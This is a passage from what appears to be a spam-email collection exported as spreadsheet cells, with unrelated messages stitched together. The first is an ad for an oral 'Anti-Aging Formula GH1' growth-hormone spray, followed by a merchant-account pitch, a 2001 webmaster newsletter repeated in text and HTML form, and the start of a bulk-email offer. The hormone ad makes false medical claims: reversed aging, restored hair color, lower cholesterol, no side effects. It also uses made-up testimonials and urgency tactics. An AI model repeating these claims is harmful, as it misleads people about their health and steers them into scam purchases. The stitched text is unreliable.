- Carolyn Munn "I was taking injections of GH for over one year. A friend suggested that 
I try Anti-Aging Formula GH1, since I was spending 1,000 US dollars a month and needed 
a doctor to inject it daily. In 2-3 weeks I felt better from the Anti-Aging 
Formula GH1 than the whole time I was getting the injections. 
Thank you Anti-Aging Formula for greatly helping to improve my life!" 
-Rita Mills McCoy "I have had elevated cholesterol levels since the first time I was tested, 
in my twenties. I was on Anti-Aging Formula GHI for only 1 month when my levels 
dropped from 245 to 210. I could hardly believe it! After 3 months on Anti-Aging 
Formula GH1 my gray hair began to darken at the roots, returning to its normal 
coloring. I have even been able to reduce my thyroid medication. All of this 
without having to change anything else about my lifestyle, other than taking 
few sprays of Anti-Aging Formula GH1 a day. Wow! 
-Alan Ross, 43 years old GH1 is the highest concentration of orally administered GH1 
available on the market today. Injections of GH taken in international units are usually prescribed to be taken as a shot, two times per day. The individual would be taking between 2 and 4 units per day. GH1 has over 2000ng per dosage and was created to imitate the body's natural secretion of GH.  
 WHAT IS GROWTH HORMONE (GH)? Growth hormone is a naturally occurring substance in the human body which 
is secreted by the pituitary, the master gland of the body, located in the 
endocrine system. GH is a microscopic protein substance that is chemically 
similar to insulin, which is secreted in short pulses during the first few 
hours of sleep and after exercise. GH is one of the most abundant hormones 
secreted, influencing growth of cells, bones, muscles and organs throughout 
the body. Production of GH peaks at adolescence. Every three years approximately 90% of the cells in the human body are newly made. 
The body is composed of more than 100 trillion cells that are continuously 
dying and regenerating. The brain and the nervous system retain their original 
cells; however, in the brain new proteins are continuously being produced to 
store memories of every new experience. Overall intelligence and the ability 
to learn and memorize all depend on adequate growth hormone. Growth hormone replacement therapy is now available to reverse age-related symptoms, including wrinkling of the skin, increased body fat, decreased muscle mass, increased cholesterol, decreased stamina and energy, decreased mental function and loss of libido. 
When growth hormone falls below normal levels, supplementation offers the 
all-natural potential for great benefit. Growth hormone is an amazing substance 
which is safe and effective with no known side effects, if taken in the 
proper dosage amounts. GH is one of many endocrine hormones, such as estrogen, progesterone, testosterone, 
melatonin and DHEA, that all decline in production as we age. Hormones are tiny 
chemical messengers continuously secreted in the bloodstream in order to regulate 
the activities of the vital organs. The word "hormone" is derived from a Greek word 
meaning to stimulate. Many of these hormones can be replaced to deter some of the 
effects of aging; however, GH reaches far beyond the scope of these other 
hormones. Not only does it prevent biological aging, but it acts to greatly 
reverse a broad range of signs and symptoms associated with aging, including 
making the skin more elastic and causing wrinkles to disappear. GH also 
helps restore hair color and hair loss. 
THE ETERNAL FOUNTAIN OF YOUTH? Our bodies naturally produce GH in abundance when we are young, and its production 
gradually slows over time. The amount of GH after the age of 21 falls about 14% per 
decade, so that its production is reduced in half by age 60. While GH is not new, 
its availability as a supplement has been limited. Specialized clinics and physicians 
have been using GH for over 30 years on thousands of patients with consistent results. 
Unfortunately, due to the high costs previously associated with GH, only the medical 
profession and the wealthy have been privy to its benefits. Another problem has been 
that the large GH molecule, composed of 191 amino acids (protein), had been only 
effective administered through injections. However, a new technology developed by 
Anti-Aging Inc., now makes GH an effective, affordable and convenient alternative. 
GH production falls by 80% from age 21 to 61  
Growth hormone declines with age in every animal species that has been tested to date. 
The amount of decline in humans falls approximately 14% per decade. 
This results in the growth hormone production rate being reduced in half by the age 
of 60. Humans produce on a daily basis 500 micrograms per year at age 20, 
200 micrograms at age 40 and 25 micrograms at 80 years of age. Between the ages 
of 70 and 80, nearly everyone is deficient in growth hormone which results in SDS, 
or Somatotrophin Deficiency Syndrome. These symptoms are part of the disease called 
aging which the medical community has determined is not a normal occurrence. 
Healing ability and energy levels decrease, as does physical mobility. 
Those who want to maintain their youthful vitality and stamina should include 
an effective growth hormone therapy as part of their health regimen.
 After numerous clinical studies, the following was determined 
after 6 or more months of GH therapy:  _ Improved memory 
_ Regenerating of the brain, heart, liver, pancreas, spleen, kidneys and other organs 
_ Increased sexual drive and performance 
_ Increased fertility 
_ Enhanced immune system 
_ Quicker wound and fracture healing 
_ New hair growth and color reparation 
_ Sharper vision 
_ Improved exercise performance and tolerance 
_ Increased muscle mass without exercise 
_ Reduction of cellulite and fat 
_ Increased stamina and vitality 
_ Reduction in high blood pressure 
_ Improvement in sleep 
_ Anti-aging 
_ Wrinkle reduction and smoothing 
_ Decrease in LDL (bad) cholesterol 
_ Increase in HDL (good) cholesterol 
_ Strengthening of bones 
  IS GH SAFE? 
GH has been successfully used in the medical community 
for over thirty years and has been studies for over 60 years. 
Edmond Klein, M.D. and L. Cas Terry Ph.D., tested over 
800 individuals and reported in their 1995 study that 
GH had substantial benefits and no side effects.
 *********************************************************************** 
You're going to receive Anti-Aging Formula for under $150.00... 
Not even $50.00... You are going to receive the entire 
life-changing Anti-Aging Formula for only $28.95. 
This is NOT a misprint. 
But you had better act fast because supplies are limited. 
 PS I almost forgot. 
"Anti-Aging Formula" comes with a ONE MONTH FULL REFUND GUARANTEE! 
So your one-time fee is refundable making your decision risk free! 
WE GUARANTEE THAT IF YOU ARE NOT COMPLETELY SATISFIED, 
JUST RETURN THE UN-USED PORTION WITHIN 30 DAYS AND 
WE WILL GIVE YOU A FULL REFUND OF THE PURCHASE PRICE. 
 *** Our normal price for Anti-Aging Formula is 28.95 dollars.
  For a limited time only, you can purchase a 3 MONTH SUPPLY for only $48.95! 
That is a savings of $37.90 off our regular price. 
 We will also continue to offer you the Anti-Aging Formula at this low price as long as you purchase from us in the future. To take advantage of this savings you must order within the next 10 days. 
*********************************************************************** 
 ORDER TODAY: (CREDIT CARD, CASH, CHECK, OR MONEY ORDER) 
 SEND Only $28.95(Each bottle is a months supply.) 
For Shipping OUTSIDE the US please add $11.00or  3 MONTHS SUPPLY for only $48.95! 
For Shipping OUTSIDE the US please add $11.00. Shipping is included! 
 To place your order merely fill out the following form and fax to 1-7.7.5-6.6.7-9.2.1.6. 
If this line is busy, please try faxing to 1-4.1.3-3.7.5-0.1.0.9.Internet Information Services 
PO Box 21442 
Billings, MT 59104 
(ALL ORDERS FILLED WITHIN 24 HOURS OF RECEIVING THEM)
Please allow 7 days for delivery. 
************************* 
Card Order Form Name on Card: Address: City/State/ZIP: Your email address: 
 ++++++++++++++++++++++++++++++++++++++++ 
Please circle one  Please send me a ONE month supply for $28.95 
For Shipping OUTSIDE the US please add $11.00 OR 
 Please send me a THREE month supply for $48.95  For Shipping OUTSIDE the US please add $11.00  This is a savings of $37.90 off our regular price. 
 ++++++++++++++++++++++++++++++++++++++++ Card Number: Date Card Expires: If you do not receive your order within 10 days, please send us a fax letting us know of the late 
arrival. We will then contact you to figure out why you have not received your order. Please tell us your phone Number: Please tell us your fax Number: 
To order by Check or Money Order: MAKE YOUR CHECK PAYABLE TO 
Internet Information Services Name: Address: City/State/ZIP: E-mail Address: If you do not receive your order within 10 days, please send us a fax letting us know of the late 
arrival. We will then contact you to figure out why you have not received your order. Please tell us your phone Number: Please tell us your fax Number: Thank you for your business, Internet Information Services 
PO Box 21442 
Billings, MT 59104 Fax to 1-7.7.5-6.6.7-9.2.1.6. If this line is busy, please try faxing to 1-4.1.3-3.7.5-0.1.0.9. Copyright (c) 1997-2000 
All Rights Reserved  
Anti-Aging Formula comes with a ONE MONTH FULL REFUND GUARANTEE! 
So your one-time fee is refundable making your decision easy! 
WE GUARANTEE THAT IF YOU ARE NOT COMPLETELY SATISFIED, 
JUST RETURN THE UN-USED PORTION WITHIN 30 DAYS 
AND WE WILL GIVE YOU A FULL REFUND OF THE PURCHASE PRICE.  +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
 This ad is produced and sent out by: Universal Advertising Systems 
To be taken off our list please email us at 
vanessagreen@freeze.com 
with take me off in the subject line or call us toll free at 
1-8.8.8-6.05-2.4.8.5 and give us your email address 
or write us at:Central Database, PO Box 1200, Oranjestad, Aruba 
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
 Content-Transfer-Encoding: 7BIT  </t>
  </si>
  <si>
    <t xml:space="preserve">
Does Your Business Need to Accept Credit Cards Today?Are Your Merchant Fees Too Expensive?99% APPROVALSign Up NOW and Get a FREE Shopping Cart!Start Your e-Commerce Store Today!   ï¿½Merchant Account
   ï¿½Free Shopping Cart
   ï¿½Website Design
   ï¿½Website Hosting
   ï¿½Domain Name RegistrationAccept Visa, MasterCard, Discover/Novus and American ExpressNO APPLICATION FEESReply NOW for a FREE, No-Obligation Quote!Name:
Phone:
Website Address:
Type Of Business:
Time to Call:
Comments:To be removed from future offers please reply
with the word "remove" in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">
--1074482631.993802752000.JavaMail.RovAdmin.rovweb002
Content-Type: text/plain; charset=iso-8859-1Your Membership Exchange, Issue #423 (June 28, 2001)
Your place to exchange ideas, ask questions, swap links, and share your skills!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______________________________________________________
Today's Special Announcement:I'll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FREE Teleseminar
Michael T. Glaspie - Founder ______________________________________________________
We apologize for any technical problems you may have had with
our last mailing, we are working hard to ensure that such problems 
will not occur again.In This Issue:
&gt;&gt; Q &amp; A 
    QUESTIONS: 
     - Using pictures as links? 
    ANSWERS: 
     - Unblocking sites so I can access? 
       Z. OConan: Access using a proxy 
       G. Bendickson: Using A Proxy To Visit Blocked Sites 
&gt;&gt; MEMBER SHOWCASES 
&gt;&gt; MEMBER *REVIEWS* 
     - Sites to Review: #124, #125 &amp; #126! 
     - Site #123 Reviewed! 
     - Vote on Your Favorite Website Design! ______________________________________________________
&gt;&gt;&gt;&gt;&gt;&gt;&gt; QUESTIONS &amp; ANSWERS &lt;&lt;&lt;&lt;&lt;&lt;&lt; 
Do you a burning question about promoting your website, html design, 
or anything that is hindering your online success? Submit your questions
to MyInputAre you net savvy? Have you learned from your own trials and errors and 
are willing to share your experience? Look over the questions each day, 
and if you have an answer or can provide help, post your answer to 
MyInput@AEOpublishing.com  Be sure to include your signature 
file so you get credit (and exposure to your site). 
QUESTIONS: From: moviebuff@cliffhanger.com 
Subject: Using pictures as links I'm changing my website and want to use pictures for the links to other pages. 
But, someone told me I should still put a 'click here' underneath all the 
pictures. To me, this removes all purpose of using the pictures.  How can I get across that you click on the pictures to get to other pages 
without coming right out and saying so? For example, I have a page with 
actor and actress information and just want to have a picture of my 
favorite stars to click on and change the picture every couple of days. Mark 
moviebuff@cliffhanger.com ANSWERS:From: Zaak  - Zaako@linkpaks.com 
Subject: Access using a proxy &gt;From: CJ  (cj5000@post.com) 
&gt;Subject: Unblocking sites so I can access? (Issue #422) --&gt; I am currently living in a place where the ISP is 
blocking 50% of 
the web. I was told by someone that you can unblock these web sites by 
using a proxy, but I don't know what that means. I am wondering is 
there a way to get access to these sites? -- A proxy is easy to use if you use someone elses, they can be tricky to setup yourself. 
I have had very good results with Surfola. Basically you surf to their servers and then 
from there you surf Through/From their servers. I have several places I surf from that 
block content. Surfola easily bypasses them! Its also Free! You can also make money 
with them but I just use them to bypass anal retentive ISP/Corporate providers and 
because they allow me to surf anonymously! I have a detailed right-up on them at  http://linkpaks.com/paidtosurf/Surfola.php 
See there for more info. If anything is not clear feel free to ask. 
(Email &amp; Sign-up Links on http://linkpaks.com/paidtosurf/Surfola.php page) Zaak OConan 
Netrepreneur 
Http://LinkPaks.com - Surf &amp; Earn Guides 
Http://LinktoCash.com - Internet Businesses for under $100 
Http://ITeam.ws - The Hottest Product on the Net Today 
++++ Next Answer - Same Question ++++ From: Wyn Publishing - wynpublishing@iname.com 
Subject: Using A Proxy To Visit Blocked Sites &gt;From: CJ  (cj5000@post.com) 
&gt;Subject: Unblocking sites so I can access? (Issue #422) CJ, Two such sites that allows proxy surfing are: 
http://www.anonymise.com and
http://www.anonymizer.com . However, if you cannot get to that site then obviously it will not work. 
Also note, that if your ISP is dictating to you which sites you may or 
may not visit, then it is time to change providers! Gregory Bendickson, Wyn Publishing 
Over 28 Free Traffic exchange services reviewed in a fully 
customizable e-book. Download yours free and get multiple 
signups while learning the art of free web traffic! 
http://www.trafficmultipliers.com  ______________________________________________________ &gt;&gt;&gt;&gt;&gt;&gt;&gt; WEBSITE SHOWCASES &lt;&lt;&lt;&lt;&lt;&lt;&lt; 
Examine carefully - those with email addresses included WILL 
trade links with you, you are encouraged to contact them. And, there 
are many ways to build a successful business. Just look at these 
successful sites/programs other members are involved in... 
----------------------------------------------------- "It's The Most D-A-N-G-E-R-O-U-S Book on the Net"
Email 20,000 Targeted Leads Every Single Day! Slash Your 
Time Online to just 1-2 Hours Daily! Build 11 Monthly Income 
Streams Promoting ONE URL! Start building YOUR Business - 
NOT everyone elses!  http://www.roibot.com/w.cgi?R8901_bd_shwc 
----------------------------------------------------- Is your website getting traffic but not orders?
Profile, Analyze, Promote, and Track your site to 
get the results you want. Fully Guaranteed!
Free Trial Available!  http://www.roibot.com/w.cgi?R4887_saa 
------------------------------------------------------OVER 7168 SITES TO PLACE YOUR FREE AD! 
Get immediate FREE exposure on thousands of sites. 
Plus two FREE programs that will AUTOMATICALLY type 
your ad for you! Pay one time, promote all the time.
 http://www.hitekhosting.net/cgi-bin/club_click.cgi?ID2932 
----------------------------------------------------- 
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http://bannersgomlm.com/ezine  ______________________________________________________&gt;&gt;&gt;&gt;&gt;&gt;&gt; MEMBER *REVIEWS* &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
Visit these sites, look for what you like and any suggestions 
you can offer, and send your critique to MyInput@AEOpublishing.com 
And, after reviewing three sites, your web site will be added to 
the list! It's fun, easy, and it's a great opportunity to give 
some help and receive an informative review of your own site. 
Plus, you can also win a chance to have your site chosen for 
a free website redesign. One randomly drawn winner each month! 
SITES TO REVIEW:Site #124: http://www.BestWayToShop.com
Dale Pike 
rhinopez@aol.com 
Site #125: http://www.wedeliverparties.com
Dawn Clemons 
dclemons7@home.com Site #126: http://www.EClassifiedshq.com 
Carol Cohen 
Opp0rtunity@aol.com 
SITE REVIEWED:Comments on Site #123: http://netsbestinfo.homestead.com/nbi.html
Dennis 
damorganjr@yahoo.com
~~~~I reviewed site 123 and found the size of the font to be too aggressive and 
I don't like mustard yellow for a background. Also in the second or third 
paragraph is a misspelled word which should be "first-come" not as 
shown on the page.I feel a sample of the type of information offered in the newsletter should 
be displayed on the page as well as a sample of the free ads offered 
on the site. I will probably submit a free ad just to see the content of the newsletter.  As has been mentioned many times, some information about the person 
doing the page is always good.  We need some information about 
why this newsletter will be worthwhile to subscribe to. 
~~~~Dennis - I took a look at your site, and have recommendations 
for improving your page.
1- I use Internet Explorer and view web pages with my text size set to 
'smaller'. The text you used was quite large, like a font used for a heading 
for all the text. By making the text size smaller it wouldn't feel like 
you were screaming at me. Also, the background was just too much.
2- There were spelling errors in the text. Often it might be difficult for you 
to spot these yourself if you see the page all the time, but have a friend 
look it over. Spelling errors make the page look unprofessional.
3- Offer a sample of your newsletter so people can see what it looks like 
before they subscribe. Also, if you are asking for a person to give you 
their email address, you MUST have a privacy policy and let them know 
they can unsubscribe.
4- Think about adding a form for people to subscribe to the newsletter. 
It looks more professional than just offering an email address to send to.
5- Offer information about yourself, and the kinds of information your 
newsletter contains. Maybe extend your site to include back issues or 
an archive to see what information you have offered in the past.
6- Build another page for 'sponsoring info' and put prices on that 
page. Remove all pricing information from the home page.
~~~~I feel that the background is a little too bold and busy for the text. 
I also believe that the text is too large which makes it difficult to read 
quickly, and forces the reader to scroll down unnecessarily. 
I noticed some spelling errors, and I think that a link to the classifieds 
site should be provided, and online payments should be accepted. 
A site that sells advertising should have advertisments on it!
~~~~This is a very clear site with nothing interfering with the 
message.  I did not like the background colour, however that is 
personal, it did not detract from the information.  I was tempted 
to sign up for the newsletter but would have liked a link to see 
a current issue. There was an error in the wording (a word 
missed) which needs correction and I think the fonts could be 
smaller. Overall a non-confusing site which makes a nice change. *cheers*~~~~Could use a better background and the fonts are very large, there also 
are errors in the following paragraphs : 
"first com-first serve" and "to place a sponsor advertisement, 
send your to my email"
~~~~A single page site. It is necessary to subscribe to the webmaster's 
newsletter to see what he's doing, and it doesn't seem to me to be 
a way to get people to visit. I wouldn't, for example. He claims to 
have lots of tidbits of information that, he says, we probably 
didn't know, and this is possible, but in my opinion, he would be 
better served if he at least put some of the things out there for 
all to see - when the appetite, so to speak, if he want people to 
subscribe. As it is, I would not bother.
~~~~What does one expect from a site like netsbestinfo? Some useful 
resources and some useful tips and also some forms of easy 
advertisement on the net. But what we get here is a newsletter 
with the owner (whose email reads damorgarjr@yahoo.com) 
asking us to subscribe us to his newsletter for a free 4-line ad. 
He also tells of paid category of advertisements. This is all we get 
from a site which has a grand title. Even the information about 
the newsletter is hardly impressive and is presented in about 35-to-40 
points size which gets difficult to read. 
~~~~A neat enough site but the background could be a little hard on 
the eyes. There is only really one problem with this page - its 
just an advertisement for a newsletter. No, scratch that, its an 
advertisement to place free ads in a newsletter. A bold enough 
move perhaps but I learned hardly anything about the newsletter 
itself and immediately started worrying about getting a flood of 
ads to my email account so I didn't even subscribe. Presumably 
you'd want to get people to sign up so might I suggest splitting 
the page into the newsletter itself, perhaps a sample issue, 
a privacy policy and a promise not to drown in ads and then click 
for more info on your free ads. 
________________________________________
VOTE ON YOUR FAVORITE WEBSITE DESIGN!Help out the winner of the free website redesign by voting for 
YOUR favorite!  You can help out Teddy at  links4profit.com by taking a 
look at his site, then checking out the three new layouts Jana of 
AkkaBay Designs AkkaBay.com has designed specifically 
for him.  After you've visited all three, vote for your favorite. 
To make this as easy as possible for you, just click on the e-mail 
address that matches your choice - you do not need to enter 
any information in the subject or body of the message.I have included a note from Jana, and the links to Teddy's  
current site along with the three new designs:&gt;From Jana: The pages have been created as non-frame pages 
although with minor modification, the pages could be adapted 
for use in a frames environmentPlease take a look at the existing site: http://www.links4profit.comHere are the 3 redesigns: 
http://AkkaBay.com/links4profit/index.html
Vote for this design:  design1@AEOpublishing.com
http://AkkaBay.com/links4profit/index2.html
Vote for this design:  design2@AEOpublishing.com
http://AkkaBay.com/links4profit/index3.html
Vote for this design:  design3@AEOpublishing.comYou will have all of this week to vote (through June 29), and 
we'll list the favorite and most voted for layout next week.  
Teddy of course will be able to choose his favorite, and 
colors, font style/size, backgrounds, textures, etc, can all 
easily be changed on the "layout" that he likes. Free website re-designs and original graphics are provided to 
FLN Showcase winners courtesy of AkkaBay Designs. 
 http://AkkaBay.com If you have any questions about how this works or how you can 
participate, please email Amy at MyInput@AEOpublishing.com
______________________________________________________
______________________________________________________Send posts and questions (or your answers) to:
MyInput@AEOpublishing.com
Please send suggestions and comments to:
Moderator@AEOpublishing.comTo change your subscribed address, send both new 
and old address to Moderator@AEOpublishing.com
See below for unsubscribe instructions.Copyright 2001 AEOpublishing -----End of Your Membership Exchange------------------------------------------------
------------------------------------------------This email has been sent to jm@netnoteinc.com at your 
request, by Your Membership Newsletter Services.Visit our Subscription Center to edit your interests or unsubscribe.
http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.a4dfur67&amp;m=bd7n7877&amp;ea=jm@netnoteinc.comView our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jspPowered by 
Constant Contact(R)
www.constantcontact.com
--1074482631.993802752000.JavaMail.RovAdmin.rovweb002
Content-Type: text/html; charset=iso-8859-1
Your Membership Exchangeï¿½
ï¿½ï¿½
ï¿½Your Membership Exchange, Issue #423
ï¿½
ï¿½
June 28, 2001ï¿½
ï¿½
ï¿½		Your place to exchange ideas, ask questions, swap links, and share your skills!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______________________________________________________
Today's Special Announcement:I'll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FREE Teleseminar
Michael T. Glaspie - Founder
		______________________________________________________
We apologize for any technical problems you may have had with
our last mailing, we are working hard to ensure that such problems 
will not occur again.In This Issue:
&gt;&gt; Q &amp; A 
    QUESTIONS: 
     - Using pictures as links? 
    ANSWERS: 
     - Unblocking sites so I can access? 
       Z. OConan: Access using a proxy 
       G. Bendickson: Using A Proxy To Visit Blocked Sites 
&gt;&gt; MEMBER SHOWCASES 
&gt;&gt; MEMBER *REVIEWS* 
     - Sites to Review: #124, #125 &amp; #126! 
     - Site #123 Reviewed! 
     - Vote on Your Favorite Website Design! ______________________________________________________
&gt;&gt;&gt;&gt;&gt;&gt;&gt; QUESTIONS &amp; ANSWERS &lt;&lt;&lt;&lt;&lt;&lt;&lt; 
Do you a burning question about promoting your website, html design, 
or anything that is hindering your online success? Submit your questions
to MyInputAre you net savvy? Have you learned from your own trials and errors and 
are willing to share your experience? Look over the questions each day, 
and if you have an answer or can provide help, post your answer to 
MyInput@AEOpublishing.com  Be sure to include your signature 
file so you get credit (and exposure to your site). 
QUESTIONS: From: moviebuff@cliffhanger.com 
Subject: Using pictures as links I'm changing my website and want to use pictures for the links to other pages. 
But, someone told me I should still put a 'click here' underneath all the 
pictures. To me, this removes all purpose of using the pictures.  How can I get across that you click on the pictures to get to other pages 
without coming right out and saying so? For example, I have a page with 
actor and actress information and just want to have a picture of my 
favorite stars to click on and change the picture every couple of days. Mark 
moviebuff@cliffhanger.com ANSWERS:From: Zaak  - Zaako@linkpaks.com 
Subject: Access using a proxy &gt;From: CJ  (cj5000@post.com) 
&gt;Subject: Unblocking sites so I can access? (Issue #422) --&gt; I am currently living in a place where the ISP is 
blocking 50% of 
the web. I was told by someone that you can unblock these web sites by 
using a proxy, but I don't know what that means. I am wondering is 
there a way to get access to these sites? -- A proxy is easy to use if you use someone elses, they can be tricky to setup yourself. 
I have had very good results with Surfola. Basically you surf to their servers and then 
from there you surf Through/From their servers. I have several places I surf from that 
block content. Surfola easily bypasses them! Its also Free! You can also make money 
with them but I just use them to bypass anal retentive ISP/Corporate providers and 
because they allow me to surf anonymously! I have a detailed right-up on them at  http://linkpaks.com/paidtosurf/Surfola.php 
See there for more info. If anything is not clear feel free to ask. 
(Email &amp; Sign-up Links on http://linkpaks.com/paidtosurf/Surfola.php page) Zaak OConan 
Netrepreneur 
Http://LinkPaks.com - Surf &amp; Earn Guides 
Http://LinktoCash.com - Internet Businesses for under $100 
Http://ITeam.ws - The Hottest Product on the Net Today 
++++ Next Answer - Same Question ++++ From: Wyn Publishing - wynpublishing@iname.com 
Subject: Using A Proxy To Visit Blocked Sites &gt;From: CJ  (cj5000@post.com) 
&gt;Subject: Unblocking sites so I can access? (Issue #422) CJ, Two such sites that allows proxy surfing are: 
http://www.anonymise.com and
http://www.anonymizer.com . However, if you cannot get to that site then obviously it will not work. 
Also note, that if your ISP is dictating to you which sites you may or 
may not visit, then it is time to change providers! Gregory Bendickson, Wyn Publishing 
Over 28 Free Traffic exchange services reviewed in a fully 
customizable e-book. Download yours free and get multiple 
signups while learning the art of free web traffic! 
http://www.trafficmultipliers.com 
______________________________________________________ &gt;&gt;&gt;&gt;&gt;&gt;&gt; WEBSITE SHOWCASES &lt;&lt;&lt;&lt;&lt;&lt;&lt; 
Examine carefully - those with email addresses included WILL 
trade links with you, you are encouraged to contact them. And, there 
are many ways to build a successful business. Just look at these 
successful sites/programs other members are involved in... 
----------------------------------------------------- "It's The Most D-A-N-G-E-R-O-U-S Book on the Net"
Email 20,000 Targeted Leads Every Single Day! Slash Your 
Time Online to just 1-2 Hours Daily! Build 11 Monthly Income 
Streams Promoting ONE URL! Start building YOUR Business - 
NOT everyone elses!  http://www.roibot.com/w.cgi?R8901_bd_shwc 
----------------------------------------------------- Is your website getting traffic but not orders?
Profile, Analyze, Promote, and Track your site to 
get the results you want. Fully Guaranteed!
Free Trial Available!  http://www.roibot.com/w.cgi?R4887_saa 
------------------------------------------------------OVER 7168 SITES TO PLACE YOUR FREE AD! 
Get immediate FREE exposure on thousands of sites. 
Plus two FREE programs that will AUTOMATICALLY type 
your ad for you! Pay one time, promote all the time.
 http://www.hitekhosting.net/cgi-bin/club_click.cgi?ID2932 
----------------------------------------------------- 
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http://bannersgomlm.com/ezine  ______________________________________________________&gt;&gt;&gt;&gt;&gt;&gt;&gt; MEMBER *REVIEWS* &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
Visit these sites, look for what you like and any suggestions 
you can offer, and send your critique to MyInput@AEOpublishing.com 
And, after reviewing three sites, your web site will be added to 
the list! It's fun, easy, and it's a great opportunity to give 
some help and receive an informative review of your own site. 
Plus, you can also win a chance to have your site chosen for 
a free website redesign. One randomly drawn winner each month! 
SITES TO REVIEW:Site #124: http://www.BestWayToShop.com
Dale Pike 
rhinopez@aol.com 
Site #125: http://www.wedeliverparties.com
Dawn Clemons 
dclemons7@home.com Site #126: http://www.EClassifiedshq.com 
Carol Cohen 
Opp0rtunity@aol.com 
SITE REVIEWED:Comments on Site #123: http://netsbestinfo.homestead.com/nbi.html
Dennis 
damorganjr@yahoo.com
~~~~I reviewed site 123 and found the size of the font to be too aggressive and 
I don't like mustard yellow for a background. Also in the second or third 
paragraph is a misspelled word which should be "first-come" not as 
shown on the page.I feel a sample of the type of information offered in the newsletter should 
be displayed on the page as well as a sample of the free ads offered 
on the site. I will probably submit a free ad just to see the content of the newsletter.  As has been mentioned many times, some information about the person 
doing the page is always good.  We need some information about 
why this newsletter will be worthwhile to subscribe to. 
~~~~Dennis - I took a look at your site, and have recommendations 
for improving your page.
1- I use Internet Explorer and view web pages with my text size set to 
'smaller'. The text you used was quite large, like a font used for a heading 
for all the text. By making the text size smaller it wouldn't feel like 
you were screaming at me. Also, the background was just too much.
2- There were spelling errors in the text. Often it might be difficult for you 
to spot these yourself if you see the page all the time, but have a friend 
look it over. Spelling errors make the page look unprofessional.
3- Offer a sample of your newsletter so people can see what it looks like 
before they subscribe. Also, if you are asking for a person to give you 
their email address, you MUST have a privacy policy and let them know 
they can unsubscribe.
4- Think about adding a form for people to subscribe to the newsletter. 
It looks more professional than just offering an email address to send to.
5- Offer information about yourself, and the kinds of information your 
newsletter contains. Maybe extend your site to include back issues or 
an archive to see what information you have offered in the past.
6- Build another page for 'sponsoring info' and put prices on that 
page. Remove all pricing information from the home page.
~~~~I feel that the background is a little too bold and busy for the text. 
I also believe that the text is too large which makes it difficult to read 
quickly, and forces the reader to scroll down unnecessarily. 
I noticed some spelling errors, and I think that a link to the classifieds 
site should be provided, and online payments should be accepted. 
A site that sells advertising should have advertisments on it!
~~~~This is a very clear site with nothing interfering with the 
message.  I did not like the background colour, however that is 
personal, it did not detract from the information.  I was tempted 
to sign up for the newsletter but would have liked a link to see 
a current issue. There was an error in the wording (a word 
missed) which needs correction and I think the fonts could be 
smaller. Overall a non-confusing site which makes a nice change. *cheers*~~~~Could use a better background and the fonts are very large, there also 
are errors in the following paragraphs : 
"first com-first serve" and "to place a sponsor advertisement, 
send your to my email"
~~~~A single page site. It is necessary to subscribe to the webmaster's 
newsletter to see what he's doing, and it doesn't seem to me to be 
a way to get people to visit. I wouldn't, for example. He claims to 
have lots of tidbits of information that, he says, we probably 
didn't know, and this is possible, but in my opinion, he would be 
better served if he at least put some of the things out there for 
all to see - when the appetite, so to speak, if he want people to 
subscribe. As it is, I would not bother.
~~~~What does one expect from a site like netsbestinfo? Some useful 
resources and some useful tips and also some forms of easy 
advertisement on the net. But what we get here is a newsletter 
with the owner (whose email reads damorgarjr@yahoo.com) 
asking us to subscribe us to his newsletter for a free 4-line ad. 
He also tells of paid category of advertisements. This is all we get 
from a site which has a grand title. Even the information about 
the newsletter is hardly impressive and is presented in about 35-to-40 
points size which gets difficult to read. 
~~~~A neat enough site but the background could be a little hard on 
the eyes. There is only really one problem with this page - its 
just an advertisement for a newsletter. No, scratch that, its an 
advertisement to place free ads in a newsletter. A bold enough 
move perhaps but I learned hardly anything about the newsletter 
itself and immediately started worrying about getting a flood of 
ads to my email account so I didn't even subscribe. Presumably 
you'd want to get people to sign up so might I suggest splitting 
the page into the newsletter itself, perhaps a sample issue, 
a privacy policy and a promise not to drown in ads and then click 
for more info on your free ads. 
________________________________________
VOTE ON YOUR FAVORITE WEBSITE DESIGN!Help out the winner of the free website redesign by voting for 
YOUR favorite!  You can help out Teddy at  links4profit.com by taking a 
look at his site, then checking out the three new layouts Jana of 
AkkaBay Designs AkkaBay.com has designed specifically 
for him.  After you've visited all three, vote for your favorite. 
To make this as easy as possible for you, just click on the e-mail 
address that matches your choice - you do not need to enter 
any information in the subject or body of the message.I have included a note from Jana, and the links to Teddy's  
current site along with the three new designs:&gt;From Jana: The pages have been created as non-frame pages 
although with minor modification, the pages could be adapted 
for use in a frames environmentPlease take a look at the existing site: http://www.links4profit.comHere are the 3 redesigns: 
http://AkkaBay.com/links4profit/index.html
Vote for this design:  design1@AEOpublishing.com
http://AkkaBay.com/links4profit/index2.html
Vote for this design:  design2@AEOpublishing.com
http://AkkaBay.com/links4profit/index3.html
Vote for this design:  design3@AEOpublishing.comYou will have all of this week to vote (through June 29), and 
we'll list the favorite and most voted for layout next week.  
Teddy of course will be able to choose his favorite, and 
colors, font style/size, backgrounds, textures, etc, can all 
easily be changed on the "layout" that he likes. Free website re-designs and original graphics are provided to 
FLN Showcase winners courtesy of AkkaBay Designs. 
 http://AkkaBay.com If you have any questions about how this works or how you can 
participate, please email Amy at MyInput@AEOpublishing.com
______________________________________________________
______________________________________________________Send posts and questions (or your answers) to:
MyInput@AEOpublishing.com
Please send suggestions and comments to:
Moderator@AEOpublishing.comTo change your subscribed address, send both new 
and old address to Moderator@AEOpublishing.com
See below for unsubscribe instructions.Copyright 2001 AEOpublishing -----End of Your Membership Exchange
ï¿½ï¿½
 This email was sent to jm@netnoteinc.com, at your request, by Your Membership Newsletter Services.  
	Visit our Subscription Center to edit your interests or unsubscribe.
	View our privacy policy.
	Powered by
--1074482631.993802752000.JavaMail.RovAdmin.rovweb002--</t>
  </si>
  <si>
    <t xml:space="preserve">
Would you like to send a Broadcast Email Advertisement to up to
1,000,000+ PEOPLE DAILY (30,000,000+ People a Month) for FREE?----- ---- --- -- -  -
1) Let's say you... Sell a $19.95 PRODUCT or SERVICE.
2) Let's say you... Broadcast Email to 500,000 PEOPLE DAILY.
